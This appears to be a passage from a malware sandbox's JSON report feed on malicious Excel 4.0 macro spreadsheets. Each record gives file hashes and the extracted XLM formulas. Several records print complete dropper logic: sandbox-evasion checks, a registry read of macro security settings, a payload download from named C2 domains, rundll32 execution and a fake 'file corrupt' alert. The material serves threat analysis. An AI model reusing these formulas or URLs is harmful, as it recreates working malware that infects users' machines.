Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"wFgmNPmI0X\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"76229db9b1ed57c3bc3718ccf4fc2f4d88df83c8ed3548ff209f358a7320e1a6"},"analysis":{"reported":"2020-04-09T16:17:08Z","score":10},"files":[{"filename":"76229db9b1ed57c3bc3718ccf4fc2f4d88df83c8ed3548ff209f358a7320e1a6","filesize":206336,"md5":"609d333c51a74fca6784f9e0e1e00839","sha1":"a5ed7493897886a60c46d96d5b568c446b79192b","sha256":"76229db9b1ed57c3bc3718ccf4fc2f4d88df83c8ed3548ff209f358a7320e1a6","sha512":"cc2ba6e4efd14255913e5f4d3f7086323790782a8d05bb7c620f26367d901a36bdc9dae88b5d95255088fccdd9a4e44747ca550d3839de7625e6c14714fb27e7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"76229db9b1ed57c3bc3718ccf4fc2f4d88df83c8ed3548ff209f358a7320e1a6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VXDhJUXot0\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7635cb5185bc00cf0d26867dfe6316470e791fe704c8d08705a94def8874014f"},"analysis":{"reported":"2020-04-09T16:17:08Z","score":10},"files":[{"filename":"7635cb5185bc00cf0d26867dfe6316470e791fe704c8d08705a94def8874014f","filesize":167936,"md5":"417589c918684750def35f19b2825424","sha1":"57e8fd02000959ee9cfc4e4388760f067fb106dd","sha256":"7635cb5185bc00cf0d26867dfe6316470e791fe704c8d08705a94def8874014f","sha512":"0f6425b795aad59e9d553e9ac43bb0ffd25e7ba0b4466ea43d0c0ec38f08b82faec098d9aa203f2dd0941d221c7f489feb8ef47c4bccaa16558be30de31d5482","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7635cb5185bc00cf0d26867dfe6316470e791fe704c8d08705a94def8874014f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wVM2BeHoez\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"76380a4f5b034e2313435a244bda40052d4fa830506ec377863e01a2221327df"},"analysis":{"reported":"2020-04-09T16:17:08Z","score":10},"files":[{"filename":"76380a4f5b034e2313435a244bda40052d4fa830506ec377863e01a2221327df","filesize":167424,"md5":"e6309d8778d6778c2455275b84337af7","sha1":"e2a92a779857a135bbcc55d3da1058484dd50f4c","sha256":"76380a4f5b034e2313435a244bda40052d4fa830506ec377863e01a2221327df","sha512":"db0c7e32e922922b310817553ca62c6b07da22af1c3b5451d90e55ef51cd3d72f3bbda9945660d49b84caca7f98fef9d814ce1a862dfbb36e97129e342230075","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"76380a4f5b034e2313435a244bda40052d4fa830506ec377863e01a2221327df.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"5oWM4RsNKe\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"763fef34d95bbc0e492898ae4a2c6433dab6946da947375b2a893fec3dd74759"},"analysis":{"reported":"2020-04-09T16:17:08Z","score":10},"files":[{"filename":"763fef34d95bbc0e492898ae4a2c6433dab6946da947375b2a893fec3dd74759","filesize":206336,"md5":"b39dd88170e4a5613697f8b039a5849e","sha1":"24cd3e3014cda7af4264813d3817cb243aac4c47","sha256":"763fef34d95bbc0e492898ae4a2c6433dab6946da947375b2a893fec3dd74759","sha512":"fe4316028eef72a19b409b7183933488ea34aaeb699eda15aa563a1bf605ad8425f5e7d839fe41e297ddd38926e88f7112f96747d6b6ae5cc5623297ae3b53a7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"763fef34d95bbc0e492898ae4a2c6433dab6946da947375b2a893fec3dd74759.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WpvBHYsRLU\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7645e4169f17a41eb54d009b5a27f9ec62641c1bd0b30a066d14e28bee554c16"},"analysis":{"reported":"2020-04-09T16:17:08Z","score":10},"files":[{"filename":"7645e4169f17a41eb54d009b5a27f9ec62641c1bd0b30a066d14e28bee554c16","filesize":206336,"md5":"004563592492b8ee30d239937ba91eaa","sha1":"cbc83a0636bcfaffd20aea42fa226668be4eda5f","sha256":"7645e4169f17a41eb54d009b5a27f9ec62641c1bd0b30a066d14e28bee554c16","sha512":"fcd3f72447ae2fa7241fc135f2041dcdd483ede4cb13b48d4403936c8d381fcd450bde2ba571b55f3c1c392938afec8a7d7e8add2f9ba0f2901f60a883a437e4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7645e4169f17a41eb54d009b5a27f9ec62641c1bd0b30a066d14e28bee554c16.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KfhOUfuWjv\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7652463c408fff73a454c659c2980cf2e96d0c0565d0eb4d19cc15be2ac497f0"},"analysis":{"reported":"2020-04-09T16:17:08Z","score":10},"files":[{"filename":"7652463c408fff73a454c659c2980cf2e96d0c0565d0eb4d19cc15be2ac497f0","filesize":145920,"md5":"e14b1de964dc47e2dc4b7813275ae3bc","sha1":"db756d57258d82216266ef1f3fd7d8d313c65f20","sha256":"7652463c408fff73a454c659c2980cf2e96d0c0565d0eb4d19cc15be2ac497f0","sha512":"a9ab54d98d72fec9dab5f566e431db07418aaa5a63a308a2e22fdb4ddae735350afc87bc3f7f5d09a7d0bce03154b3c05748493c628d487335a32fa3b848d31d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7652463c408fff73a454c659c2980cf2e96d0c0565d0eb4d19cc15be2ac497f0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"V0RXNm3avD\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"766023c73bd7316b899419f9fc08eeb9c9e5410e6bcbfc4f115d4d455404dd48"},"analysis":{"reported":"2020-04-09T16:17:08Z","score":10},"files":[{"filename":"766023c73bd7316b899419f9fc08eeb9c9e5410e6bcbfc4f115d4d455404dd48","filesize":146944,"md5":"e1408c1536a6784bdb059ff0c072025f","sha1":"c2c76b1c39ee56676e6a6471d2ef25c2b5c57803","sha256":"766023c73bd7316b899419f9fc08eeb9c9e5410e6bcbfc4f115d4d455404dd48","sha512":"2e61ba9fb8c41e695e235e88ac302c28b38b273bcc7fe420f525023a2c33f297540a490dfae3b5c35a5c3d7112c7fe267c65656eb739b811de3ea09a89bb191d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"766023c73bd7316b899419f9fc08eeb9c9e5410e6bcbfc4f115d4d455404dd48.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"rATvpfs2Mq\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"769195d81bd37e0d56097062191dfb37b2b3a9b4aae1b070d92c433fcd13c2cb"},"analysis":{"reported":"2020-04-09T16:17:08Z","score":10},"files":[{"filename":"769195d81bd37e0d56097062191dfb37b2b3a9b4aae1b070d92c433fcd13c2cb","filesize":167936,"md5":"7d81e09cd03f615e6d36e3c721528773","sha1":"623e3d0a0a142368b7ef54d5ac36aef9dc3f5ea5","sha256":"769195d81bd37e0d56097062191dfb37b2b3a9b4aae1b070d92c433fcd13c2cb","sha512":"63716c99f8b393e099e6484f108ec980ba93061d5e26dd614ff14f4d2acb26dec0de08fa48d571cb41bd8f95c2145b97f13b9ed2ac6b0a2faf40a1787e3a30d2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"769195d81bd37e0d56097062191dfb37b2b3a9b4aae1b070d92c433fcd13c2cb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"M5IOt9EoPI\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"76979d42b5d83f4291f4e09016c1e61544bd1a960ec46c1eb48cf37270c70918"},"analysis":{"reported":"2020-04-09T16:17:08Z","score":10},"files":[{"filename":"76979d42b5d83f4291f4e09016c1e61544bd1a960ec46c1eb48cf37270c70918","filesize":209408,"md5":"2c3f3f8323d4608d2c178f7ceab48750","sha1":"b30ec7961f35efcf184d404e70c6756abf6b6d97","sha256":"76979d42b5d83f4291f4e09016c1e61544bd1a960ec46c1eb48cf37270c70918","sha512":"fcbbaa1aa42d94f05f8f67ca74443bd084c9fa09f5dd6773b82448e630ecd48754203a3c2a092023500b9c57c57190c1049a61779477acf12e0009d840ffe6a5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"76979d42b5d83f4291f4e09016c1e61544bd1a960ec46c1eb48cf37270c70918.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qyGi66LmLi\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"76c0870600afd21b7f56b3e45e8a83153690aa1373f7f20dac7a7ee4ca934e89"},"analysis":{"reported":"2020-04-09T16:17:08Z","score":10},"files":[{"filename":"76c0870600afd21b7f56b3e45e8a83153690aa1373f7f20dac7a7ee4ca934e89","filesize":167936,"md5":"bccf8e4084aa3e09dfa462c03cbfee8a","sha1":"eb3da587f4395564f5139626cf62f3f88bf84d9d","sha256":"76c0870600afd21b7f56b3e45e8a83153690aa1373f7f20dac7a7ee4ca934e89","sha512":"626c63fd9cc571649760d10cbc5bf4fd9e2ba442cb0ee68c108dbf50934d1c94ecbc7b257c64fd569d177700258d4a8d6a77c5ee09bc4953b13f0c6e4c85e8af","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"76c0870600afd21b7f56b3e45e8a83153690aa1373f7f20dac7a7ee4ca934e89.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rBMJWcyafj\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"76e214bc9f8576a89ab98c015b4e05b16c203f49e6120adfacde4177817680b4"},"analysis":{"reported":"2020-04-09T16:17:08Z","score":10},"files":[{"filename":"76e214bc9f8576a89ab98c015b4e05b16c203f49e6120adfacde4177817680b4","filesize":160768,"md5":"a7a2df4227cc968ff93b9913382ea1a8","sha1":"a68762a15b9ef4220cd0f906014cf1f88db7a168","sha256":"76e214bc9f8576a89ab98c015b4e05b16c203f49e6120adfacde4177817680b4","sha512":"4959b3fc9c6c391b77b6c63341105973e4538e844c1e529011fcc7cb8b73c71704e12cb77b12cd12ac06b73f5e09132fa54259fe4611d768ab80ca2375dca81f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"76e214bc9f8576a89ab98c015b4e05b16c203f49e6120adfacde4177817680b4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WESR7aRkwg\",TRUE)\nGOTO(IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),))\nIF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\nIF(R$5C$11\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\nCLOSE(FALSE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"76f0a266df9c9502f2322125175d22c0f518301df45ecae11d23be87549bcb63"},"analysis":{"reported":"2020-04-09T16:17:09Z","score":10},"files":[{"filename":"76f0a266df9c9502f2322125175d22c0f518301df45ecae11d23be87549bcb63","filesize":185344,"md5":"19f43a72f723e404dcba307368d22e4f","sha1":"413ae6a64be93e227e6019636c28f08da4a51866","sha256":"76f0a266df9c9502f2322125175d22c0f518301df45ecae11d23be87549bcb63","sha512":"d6e1b8809bc04e05f0ddbff7ec254ba159c9febdcdcaa5ed4394ee2fa626bf4c2c8779bd85d9564129ccdb04591da6b7ed9efe53965fc5b9db79c8a63ef7be7c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"76f0a266df9c9502f2322125175d22c0f518301df45ecae11d23be87549bcb63.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"77036a2bbc9ccde6e3e2571d10a6a4cd508aecb69f8a3e15feaa1cfd13065ebe"},"analysis":{"reported":"2020-04-09T16:17:09Z","score":10},"files":[{"filename":"77036a2bbc9ccde6e3e2571d10a6a4cd508aecb69f8a3e15feaa1cfd13065ebe","filesize":206336,"md5":"52433703988f87eb8511d79c3889dbaa","sha1":"e734d6991ee6e61e84036a1587a9b2ba4bc5e60a","sha256":"77036a2bbc9ccde6e3e2571d10a6a4cd508aecb69f8a3e15feaa1cfd13065ebe","sha512":"bcb1f5287e3b78df60958dfab61887612103fe81af1f3582df803338461eee3ecc53a799b1bf0e55662ac13f3dc84e50a2fee3236788427800073861a41ff9be","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"77036a2bbc9ccde6e3e2571d10a6a4cd508aecb69f8a3e15feaa1cfd13065ebe.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"a4WS933rpN\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"770b25f4580f79ba9f3cc033974e2b3e2efb6d5fd01633c1f1ce7a0d83c848f3"},"analysis":{"reported":"2020-04-09T16:17:09Z","score":10},"files":[{"filename":"770b25f4580f79ba9f3cc033974e2b3e2efb6d5fd01633c1f1ce7a0d83c848f3","filesize":104448,"md5":"4f5be157096ac1f38f1ec9a14137340d","sha1":"302aa5009a34d15f7f7ea5c945ca928e32429d76","sha256":"770b25f4580f79ba9f3cc033974e2b3e2efb6d5fd01633c1f1ce7a0d83c848f3","sha512":"2a6e985284d0ba118f8fafa3c964bbdd0b8a9ea3e0057c12020a7cccb018fe5c1bcac9e94a9ac9723d17778edd288d5a9b511b46153599c1580acaf099200252","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"770b25f4580f79ba9f3cc033974e2b3e2efb6d5fd01633c1f1ce7a0d83c848f3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"9ObrpJsqIy\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
